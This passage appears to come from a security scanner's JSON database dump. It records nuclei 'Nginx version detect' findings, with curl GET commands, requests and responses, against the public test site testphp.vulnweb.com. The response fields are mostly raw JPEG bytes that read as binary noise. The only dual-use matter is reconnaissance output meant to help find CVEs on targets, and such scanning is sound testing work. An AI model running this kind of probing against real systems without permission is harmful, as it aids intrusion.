nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 259, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:34:57.740Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 260, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/9.1.2 Safari/602.3.12' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:34:57.840Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/9.1.2 Safari/602.3.12\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�